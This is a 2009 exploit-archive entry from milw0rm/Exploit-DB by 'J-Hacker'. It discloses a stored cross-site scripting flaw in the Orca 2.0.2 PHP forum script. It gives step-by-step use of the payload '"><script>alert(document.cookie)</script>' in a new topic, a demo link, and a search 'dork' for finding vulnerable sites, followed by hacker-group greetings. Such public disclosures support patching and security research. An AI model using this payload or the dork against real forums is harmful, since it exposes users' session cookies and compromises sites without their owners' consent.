Orca 2.0.2 - 'topic ' Cross-Site Scripting

EDB-ID:

7931

CVE:

N/A


Author:

J-Hacker

Type:

webapps


Platform:

PHP

Date:

2009-01-30


--------------------------------------------------------------------------\
[+]  Script : Orca-v.2.0.2
[+]  Bug: Xss
[+]  By: J-Hacker || Jerusalem Hacker || From : soqor.net
[+]  Email : M0t4z@hotmail.com
[+]  Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0
[+]  D0rk :Powered by Orca Interactive Forum Script. Copyright 2008 My Company
--------------------------------------------------------------------------
First you must login then write new topic
write in the topic
 "><script>alert(document.cookie)</script>
demo: http://www.demozzz.com/orca/demo/?action=goto&topic_id=test--2009-01-30#topic/-script-alert-document-cookie-script-.htm
--------------------------------------------------------------------------
[+] Greetz : HACKERS PAL , Sp1d3r_Net , Mr.5rab , Dr.CriMiNAL SyRiA , And All soqor.net members
[+] http://WwW.SoQoR.NeT
--------------------------------------------------------------------------/

# milw0rm.com [2009-01-30]